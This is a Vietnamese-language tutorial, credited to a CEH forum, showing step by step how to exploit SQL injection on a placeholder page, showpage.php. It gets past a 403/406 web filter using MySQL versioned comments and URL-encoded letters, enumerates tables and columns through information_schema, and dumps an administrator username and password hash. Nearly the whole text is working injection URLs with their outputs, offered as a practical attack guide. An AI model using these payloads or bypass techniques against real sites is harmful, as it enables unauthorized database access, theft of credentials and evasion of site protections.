Bypass 403 + Filter

Site : http://site.com/showpage.php?pid=3

Ta order by để tìm số column

http://site.com/showpage.php?pid=3+group+by+1   =>> bình thường
http://site.com/showpage.php?pid=3+group+by+2   =>> bình thường
http://site.com/showpage.php?pid=3+group+by+3   =>> bình thường
http://site.com/showpage.php?pid=3+group+by+4   =>> lỗi

Vậy là ta tìm đc 3 column

Tiếp tục tìm cột lỗi ta thử

http://site.com/showpage.php?pid=3+union+select+1,2,3

lỗi 406 tiếp tục bypass

http://site.com/showpage.php?pid=3+union+/*!select*/+1,2,3

lỗi 403 ta bypass tiếp

http://site.com/showpage.php?pid=3+union+/*!12345select*/+1,2,3

vẫn bị vẫn Forbidden

Tiếp tục bypass bằng cách encode 1 số kí tự

Các bạn có thể vào đây để xem chi tiết

http://www.greentea.markschwing1.com/unico.html

Thay : U = %55 T = %54 ta đc

" +%55nion+/*!12345selec%54*/+1,2,3 "

http://site.com/showpage.php?pid=3+%55nion+/*!12345selec%54*/+1,2,3

kết quả trả về không lỗi
ta thêm - sau ?pid= để hiện cột lỗi

http://site.com/showpage.php?pid=-3+%55nion+/*!12345selec%54*/+1,2,3

và ta thấy cột lỗi là số 3

Tiếp đến ta tìm version

http://site.com/showpage.php?pid=-3+%55nion+/*!12345selec%54*/+1,2,version()

=>>>  Forbidden

http://site.com/showpage.php?pid=-3+%55nion+/*!12345selec%54*/+1,2,@@version

=>> Forbidden

http://site.com/showpage.php?pid=-3+%55nion+/*!12345selec%54*/+1,2,@@GLOBAL.VERSION

 5.1.73-cll

Ok vậy là version 5

Tiếp tục tìm table_name

http://site.com/showpage.php?pid=-3+%55nion+/*!12345selec%54*/+1,2,/*!12345table_name*/+from+information_schema./*!12345tables*/+limit+0,1

Vì filter nó đã chặn () nên ta phải sử dụng lệnh limit
Ta cứ tiếp tục limit 1,1 .. limit 2,1 .... đến khi nào tìm thấy table chứa thông tin admin

http://site.com/showpage.php?pid=-3+%55nion+/*!12345selec%54*/+1,2,/*!12345table_name*/+from information_schema./*!12345tables*/+limit+34,1

=>> tìm được tables: login

Tiếp tục tìm column 

http://site.com/showpage.php?pid=-3+%55nion+/*!12345selec%54*/+1,2,/*!12345column_name*/+from+information_schema./*!12345columns*/+where+/*!12345table_name*/=0x6c6f67696e

=> Tìm được column:  id

ở đây " 6c6f67696e " chính là mã hex của login
tiếp tục limit để tìm các column còn lại

http://site.com/showpage.php?pid=-3+%55nion+/*!12345selec%54*/+1,2,/*!12345column_name*/+from+information_schema./*!12345columns*/+where+/*!12345table_name*/=0x6c6f67696e+limit+1,1

=> Tìm được column:   user

http://site.com/showpage.php?pid=-3+%55nion+/*!12345selec%54*/+1,2,/*!12345column_name*/+from+information_schema./*!12345columns*/+where+/*!12345table_name*/=0x6c6f67696e+limit+2,1

=>> Tìm được column:    pass

Vậy là ta đã tìm đc tên column là user + pass

Bước cuối cùng là lấy thông tin admin 

http://site.com/showpage.php?pid=-3+%55nion+/*!12345selec%54*/+1,2,user+from+login

lấy được user là:  administrator

http://site.com/showpage.php?pid=-3+%55nion+/*!12345selec%54*/+1,2,pass+from+login

pass là : 0e61d9a9c7b6910eab3d261d9d118ab6

Vậy kết quả cuối cùng ta thu đc là

administrator | 0e61d9a9c7b6910eab3d261d9d118ab6


Nguồn:  NBT - ceh.vn